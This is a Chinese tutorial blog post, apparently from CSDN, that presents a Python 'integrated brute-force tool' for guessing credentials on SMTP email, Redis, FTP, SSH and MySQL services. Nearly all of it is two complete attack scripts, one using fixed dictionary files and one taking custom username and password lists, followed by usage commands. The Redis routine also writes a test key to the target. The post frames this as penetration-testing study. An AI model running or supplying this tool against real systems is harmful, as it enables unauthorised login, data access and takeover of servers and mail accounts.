集成爆破工具.
集合爆破里面包含了:电子邮件爆破工具,Redis爆破工具,FTP爆破工具,SSH爆破工具,MySQL爆破工具。
目录:
集合爆破工具.
电子邮件 爆破工具:
Redis 爆破工具:
FTP 爆破工具:
SSH 爆破工具:
MySQL 爆破工具:
集合爆破工具编写:
(1)固定字典编写:
运行效果:
(2)可自定义字典.
运行效果:
电子邮件 爆破工具:
用于尝试猜测电子邮件账号的密码,通常使用常见密码或字典进行爆破。
Python 渗透测试:电子邮件 SMTP 协议爆破.(25端口)-CSDN博客
Redis 爆破工具:
用于尝试猜测Redis服务器的访问密码,以获取对Redis数据库的控制权限。
Python 渗透测试:Redis 数据库 弱密码测试.(6379端口)-CSDN博客
FTP 爆破工具:
用于尝试猜测FTP服务器的用户名和密码,以便登录并访问FTP服务器上的文件。
Python 渗透测试:FTP 文件传输 爆破.(21端口)-CSDN博客
SSH 爆破工具:
用于尝试猜测SSH服务器的用户名和密码,以便远程登录并控制目标服务器。
Python 渗透测试:SSH 加密通道 传输文件 爆破.(22 端口)-CSDN博客
MySQL 爆破工具:
用于尝试猜测MySQL数据库的用户名和密码,以便获取对数据库的访问权限。
Python 渗透测试:MySQL 数据库爆破.(3306 端口)-CSDN博客
集成爆破工具编写:
(1)固定字典编写:
from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sys
def ftp_check(ip,username,password):
ftp = FTP()
print('check->'+ip+'|'+username+'|'+password)
try:
ftp.connect(ip, 21)
ftp.login(username,password)
print('success')
exit()
except Exception as e:
print('failed')
def ssh_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,"22",username,password)
print('success')
exit()
except Exception as e:
print('failed')
def mysql_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
try:
conn_obj = pymysql.connect(
host=ip, # MySQL服务端的IP地址
port=3306, # MySQL默认PORT地址(端口号)
user=username, # 用户名
password=password, # 密码,也可以简写为passwd
database='mysql', # 库名称,也可以简写为db
charset='utf8' # 字符编码
)
print('success')
exit()
except Exception as e:
pass
def redis_check(ip,password):
print('check->' + ip + '|' + password)
try:
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'xiaodi')
print('success')
exit()
except Exception as e:
pass
def email_check(ip,username,password):
print('check->' + ip + '|' +username+'|'+ password)
try:
smtpObj = smtplib.SMTP()
smtpObj.connect('smtp.'+ip, 25) # 25 为 SMTP 端口号
smtpObj.login(username, password)
print('ok')
exit()
except smtplib.SMTPException:
print("Error")
if __name__ == '__main__':
pypath = os.getcwd()
print('eg:固定字典使用说明:')
print('python all.py ftp 127.0.0.1')
print('python all.py ssh 127.0.0.1')
print('python all.py redis 127.0.0.1')
print('python all.py mysql 127.0.0.1')
print('python all.py email')
xy=sys.argv[1] # 判断类型,然后进行
ip=sys.argv[2] # 判断 IP 地址
# zidian = sys.argv[3] # 接收账号的字典
# zidian2=sys.argv[4] # 接收密码的字典
#没有设置自定义字典,采用固定字典
#if len(zidian)==0:
if xy=='ftp':
for username in open(pypath + '//dic_username_ftp.txt'):
username = username.replace('\n', '')
for password in open(pypath + '//dic_password_ftp.txt'):
password = password.replace('\n', '')
ftp_check(ip, username, password)
elif xy=='ssh':
for username in open(pypath + '//dic_username_ssh.txt'):
username = username.replace('\n', '')
for password in open(pypath + '//dic_password_ssh.txt'):
password = password.replace('\n', '')
ssh_check(ip, username, password)
elif xy=='mysql':
for username in open(pypath + '//username_mysql.txt'):
username = username.replace('\n', '')
for password in open(pypath + '//password_mysql.txt'):
password = password.replace('\n', '')
mysql_check(ip, username, password)
elif xy=='redis':
for password in open(pypath + '//dic_password_redis.txt'):
password = password.replace('\n', '')
redis_check(ip, password)
elif xy=='email':
for username in open(pypath + '//email_username.txt'):
username = username.replace('\n', '')
ip = username.split('@')[1]
for password in open(pypath + '//email_password.txt'):
password = password.replace('\n', '')
email_check(ip, username, password)运行效果:
D:\python\python.exe 爆破.py mysql 127.0.0.1
python [名.py] [要爆破的类型] [IP地址]
(2)可自定义字典.
from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sys
def ftp_check(ip,username,password):
ftp = FTP()
print('check->'+ip+'|'+username+'|'+password)
try:
ftp.connect(ip, 21)
ftp.login(username,password)
print('success')
exit()
except Exception as e:
print('failed')
def ssh_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,"22",username,password)
print('success')
exit()
except Exception as e:
print('failed')
def mysql_check(ip,username,password):
print('check->' + ip + '|' + username + '|' + password)
try:
conn_obj = pymysql.connect(
host=ip, # MySQL服务端的IP地址
port=3306, # MySQL默认PORT地址(端口号)
user=username, # 用户名
password=password, # 密码,也可以简写为passwd
database='mysql', # 库名称,也可以简写为db
charset='utf8' # 字符编码
)
print('success')
exit()
except Exception as e:
pass
def redis_check(ip,password):
print('check->' + ip + '|' + password)
try:
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'xiaodi')
print('success')
exit()
except Exception as e:
pass
def email_check(ip,username,password):
print('check->' + ip + '|' +username+'|'+ password)
try:
smtpObj = smtplib.SMTP()
smtpObj.connect('smtp.'+ip, 25) # 25 为 SMTP 端口号
smtpObj.login(username, password)
print('ok')
exit()
except smtplib.SMTPException:
print("Error")
if __name__ == '__main__':
pypath = os.getcwd()
print('python all.py email')
print('eg:自定义字典使用说明:')
print('python all.py ftp 127.0.0.1 user.txt pass.txt')
print('python all.py ssh 127.0.0.1 user.txt pass.txt')
print('python all.py redis 127.0.0.1 user.txt pass.txt')
print('python all.py mysql 127.0.0.1 user.txt pass.txt')
print('python all.py email user.txt pass.txt')
xy=sys.argv[1] # 判断类型,然后进行
ip=sys.argv[2] # 判断 IP 地址
zidian = sys.argv[3] # 接收账号的字典
zidian2=sys.argv[4] # 接收密码的字典
#设置了自定义字典
if xy=='ftp':
for username in open(pypath +'\\'+ zidian):
username = username.replace('\n', '')
for password in open(pypath +'\\'+ zidian2):
password = password.replace('\n', '')
ftp_check(ip, username, password)
elif xy=='ssh':
for username in open(pypath +'\\'+ zidian):
username = username.replace('\n', '')
for password in open(pypath + '\\'+ zidian2):
password = password.replace('\n', '')
ssh_check(ip, username, password)
elif xy=='mysql':
for username in open(pypath + '\\'+ zidian):
username = username.replace('\n', '')
for password in open(pypath + '\\'+ zidian2):
password = password.replace('\n', '')
mysql_check(ip, username, password)
elif xy=='redis':
for password in open(pypath + '\\'+ zidian):
password = password.replace('\n', '')
redis_check(ip, password)
elif xy=='email':
for username in open(pypath + '\\'+ zidian):
username = username.replace('\n', '')
ip = username.split('@')[1]
for password in open(pypath + '\\'+ zidian2):
password = password.replace('\n', '')
email_check(ip, username, password)运行效果:
D:\python\python.exe 爆破.py mysql 127.0.0.1 username_mysql.txt password_mysql.txt
python [名.py] [要爆破的类型] [IP地址] [账号字典] [密码字典]
学习链接:第159天:安全开发-Python-协议库爆破&FTP&SSH&Redis&SMTP&MYSQL等_哔哩哔哩_bilibili
